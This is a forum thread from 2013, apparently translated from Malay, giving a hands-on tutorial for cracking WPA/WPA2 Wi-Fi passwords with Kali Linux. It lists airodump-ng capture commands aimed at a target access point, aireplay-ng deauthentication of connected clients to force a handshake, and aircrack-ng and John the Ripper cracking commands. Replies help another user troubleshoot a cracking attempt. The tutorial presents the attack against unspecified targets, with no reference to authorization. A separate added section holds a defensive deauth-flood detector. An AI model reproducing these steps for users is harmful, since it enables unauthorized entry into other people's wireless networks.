Cracking WPA/WPA2 passwords manually using Kali Linux

Discussion in 'Malay Support | Sokongan Melayu' started by comfast98, 28 Sep 2013.

  1. comfast98

    Today I have a little spare time, so I'm planning to write a tutorial on cracking WPA/WPA2 passwords manually.

    Here are the basic steps you need to know:
    - Put the interface into monitor mode
    - Find a wireless network protected by WPA2 with a pre-shared key
    - Capture all the packets
    - Wait until a client appears and deauthenticate that client so we get the handshake
    - Last step, crack the key or password using a dictionary or John the Ripper.

    OK, in this tutorial I'm using an Alfa AWUS036H wireless adapter with a 9 dBi antenna, and Kali Linux.

    In my OS the adapter shows up as wlan0.
    First of all, put the wlan0 interface into monitor mode:
    [screenshot]

    Now our monitor-mode interface is known as mon0.
    Next, let's look for Wi-Fi networks protected with WPA2/PSK.
    Use this command:
    root@kali:~# airodump-ng mon0
    [screenshot]

    Stop airodump-ng (press Ctrl-C) and run airodump-ng again so we focus on just one Access Point (AP), our target.
    Use a command like this:
    root@kali:~# airodump-ng mon0 --channel 6 --bssid 00:11:22:33:44:55 -w /tmp/wpa2
    Where:
    mon0 – your monitor-mode interface
    --channel 6 – the target Wi-Fi channel
    --bssid – the target router's MAC address
    -w – the path where our .cap file will be saved.
    [screenshot]

    At this point you can either wait until we get the 4-way handshake, or we can deauthenticate a client to speed up getting that handshake. Since time is money, we'll deauthenticate a client to force it to reassociate. We'll need the AP's BSSID (-a) and the MAC address of a client connected to that AP (-c).
    Use this command:
    root@kali:~# aireplay-ng -0 1 -a 00:11:22:33:44:55 -c aa:bb:cc:dd:ee:ff mon0
    [screenshot]
    The picture above shows I had to deauthenticate 2 clients to get the handshake.

    Now we have the handshake:
    [screenshot]

    Stop airodump-ng (press Ctrl-C) and make sure all the files have been saved.
    root@kali:~# ls /tmp/wpa2*
    -rw-r--r-- 1 root root 4678704 Jun 18 10:41 wpa2-01.cap
    -rw-r--r-- 1 root root     788 Jun 19 10:41 wpa2-01.csv
    -rw-r--r-- 1 root root     595 Jun 18 10:41 wpa2-01.kismet.csv
    -rw-r--r-- 1 root root    5743 Jun 19 10:41 wpa2-01.kismet.netxml
    *Note: the file names may differ; you need to check what the saved files are actually named.

    From this point on, all the cracking work is offline. So you can go out on a date, have a coffee while watching BoBoiBoy, whatever. WPA cracking is brute-force based, which means it takes a very long time and everything depends on the dictionary you have. The bigger the wordlist, the longer it takes to finish.

    For the first option, we'll use a wordlist.
    If your wordlist is named word.txt and sits in the path /tmp/wordlist, run a command like this:
    root@kali:~# aircrack-ng -w /tmp/wordlist/word.txt -b 00:11:22:33:44:55 /tmp/wpa2*.cap

    The second option is to use John the Ripper. This method can succeed, but it takes a very long time; you might not even live long enough to see it succeed, hahaha.
    You can use a command like this:
    root@kali:~# john --stdout --incremental:all | aircrack-ng -b 00:11:22:33:44:55 -w - /tmp/wpa2*.cap

    That's all for this tutorial, good luck trying it out :)
     
    #1 comfast98, 28 Sep 2013
    Last edited: 28 Sep 2013
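As an added example (not part of the original post or of the aircrack-ng project), here is the defender-side view of the deauthentication step above: a small Python detector that parses raw 802.11 management frame headers and flags a burst of deauthentication frames aimed at one BSSID, the pattern a wireless IDS alerts on. The frames are constructed inline; the BSSID and client MAC are the placeholder values from the tutorial, and the window and threshold are assumed tuning values.

```python
# Added example: detect a deauthentication burst from raw 802.11 management frames.
# Frame bytes are constructed below (no capture file or scapy needed).
import struct
from collections import defaultdict

DEAUTH_SUBTYPE = 12  # type 0 (management), subtype 12 = deauthentication
BEACON_SUBTYPE = 8

def parse_mgmt_frame(frame: bytes):
    """Return (subtype, src_mac, bssid, reason_code) for a management frame, else None."""
    if len(frame) < 24:
        return None
    fc = frame[0]                       # frame control, first byte
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    if ftype != 0:                      # only management frames are of interest here
        return None
    src, bssid = frame[10:16].hex(":"), frame[16:22].hex(":")
    reason = None
    if subtype == DEAUTH_SUBTYPE and len(frame) >= 26:
        reason = struct.unpack("<H", frame[24:26])[0]   # 2-byte reason code after the header
    return subtype, src, bssid, reason

def detect_deauth_floods(frames, window=2.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes), in time order.
    Returns {bssid: peak_count} for BSSIDs that saw >= threshold deauths in any window."""
    recent = defaultdict(list)          # bssid -> timestamps of recent deauth frames
    alerts = {}
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if parsed is None or parsed[0] != DEAUTH_SUBTYPE:
            continue
        q = recent[parsed[2]]
        q.append(ts)
        while q and ts - q[0] > window:  # slide the window forward
            q.pop(0)
        if len(q) >= threshold:
            alerts[parsed[2]] = max(alerts.get(parsed[2], 0), len(q))
    return alerts

def build_mgmt_frame(subtype, dst, src, bssid, reason=None):
    """Construct a minimal management frame: FC, duration, addr1-3, seq ctrl, optional reason."""
    mac = lambda m: bytes.fromhex(m.replace(":", ""))
    hdr = bytes([subtype << 4, 0]) + b"\x00\x00" + mac(dst) + mac(src) + mac(bssid) + b"\x00\x00"
    return hdr + (struct.pack("<H", reason) if reason is not None else b"")

# Constructed sample traffic: beacons, an 8-frame deauth burst spoofed from the AP, one lone deauth elsewhere.
AP, CLIENT, OTHER_AP = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:ff", "66:77:88:99:aa:bb"
SAMPLE_FRAMES = sorted(
    [(t * 0.5, build_mgmt_frame(BEACON_SUBTYPE, "ff:ff:ff:ff:ff:ff", AP, AP)) for t in range(4)]
    + [(1.0 + i * 0.1, build_mgmt_frame(DEAUTH_SUBTYPE, CLIENT, AP, AP, reason=7)) for i in range(8)]
    + [(5.0, build_mgmt_frame(DEAUTH_SUBTYPE, CLIENT, OTHER_AP, OTHER_AP, reason=3))],
    key=lambda f: f[0])
```

Running `detect_deauth_floods(SAMPLE_FRAMES)` reports only the tutorial's AP BSSID; the single deauth against the other AP stays below the threshold, which is what keeps ordinary client disconnects from paging anyone.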
  2. firesheep

    Thanks for sharing this tutorial, bro :)
     
  3. Neogrimjaw

    Hi, can I ask a few questions? First, I tried cracking a WPA2 password; I almost finished, and at the last step I needed to use this command "aircrack-ng -w wordlist.txt --bssid 00:11... wordlist-01.cap", but it says that my wordlist can't be found. So how do I check this wordlist, or how can I make it?

    Second, I tried to use this command "wash -i [your interface] [mine is wlan0] -c CHANNEL_NUM -C -s", but it only replies ''[!] Found packet with bad FCS, skipping...'' and never stops. Can you help me please? Hope to get this info ASAP.
     
  4. Fuggs

    I think you need to first check the wordlist-01.cap file: where did you put it?
    example:

    root@kali:~# aircrack-ng -w /tmp*(if you put it in the tmp folder, find where you put it)/wordlists/word.txt -b 00:11:22:33:44:55 /tmp/wpa2*.cap

    Look carefully and learn slowly; see and fix the error... maybe if you try many times the file changes to -01, 02, 03....

    If you fail with the manual way, I think it's better to use the existing software in xiao os, and then you need to find the password directory......
     
  5. grapox

    Great, bro.. thanks
     